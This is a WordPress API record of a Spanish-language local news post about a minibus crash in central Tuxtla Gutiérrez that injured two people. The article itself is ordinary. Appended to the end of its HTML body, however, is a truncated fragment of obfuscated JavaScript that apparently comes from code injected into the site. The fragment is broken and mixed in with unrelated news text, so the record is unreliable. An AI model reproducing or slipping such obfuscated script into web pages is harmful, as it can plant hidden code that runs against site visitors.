{"id":7939,"date":"2023-01-10T01:04:40","date_gmt":"2023-01-10T01:04:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7939"},"modified":"2023-01-10T01:04:41","modified_gmt":"2023-01-10T01:04:41","slug":"colectivazo-en-el-centro-de-tuxtla-deja-dos-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7939","title":{"rendered":"Colectivazo en el centro de Tuxtla deja dos heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040-1024x577.jpg\" alt=\"\" class=\"wp-image-7940\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230109-WA0040.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 9 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente de tr\u00e1nsito ocurrido este lunes por la ma\u00f1ana dej\u00f3 un saldo de dos heridos y cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales sobre este tema informaron que, este accidente ocurri\u00f3 sobre la Tercera Norte y Octava Poniente cuando el colectivo de la ruta 131 y n\u00famero econ\u00f3mico 18 impact\u00f3 a un Jetta de color rojo cuando circulaba en el sentido de Sur a Norte.<\/p>\n\n\n\n<p>Las dos unidades terminaron incrustadas sobre unos contenedores de basura.<\/p>\n\n\n\n<p>Un pasajero, result\u00f3 con lesiones en el brazo izquierdo y clav\u00edcula.<\/p>\n\n\n\n<p>En el carro particular se report\u00f3 una mujer herida.<\/p>\n\n\n\n<p>Al arribo de los elementos de tr\u00e1nsito municipal determinaron que, el responsable era el conductor del colectivo.<\/p>\n\n\n\n<p>Mediante un seguro, se hizo responsable de los da\u00f1os y las unidades fueron trasladadas a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 9 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente de tr\u00e1nsito ocurrido este lunes por la ma\u00f1ana dej\u00f3 un saldo de dos heridos y cuantiosos da\u00f1os materiales. Los reportes oficiales sobre este tema informaron que, este accidente ocurri\u00f3 sobre la Tercera Norte y Octava Poniente cuando el colectivo de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7940,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7939","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7939"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7939\/revisions"}],"predecessor-version":[{"id":7941,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7939\/revisions\/7941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7940"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}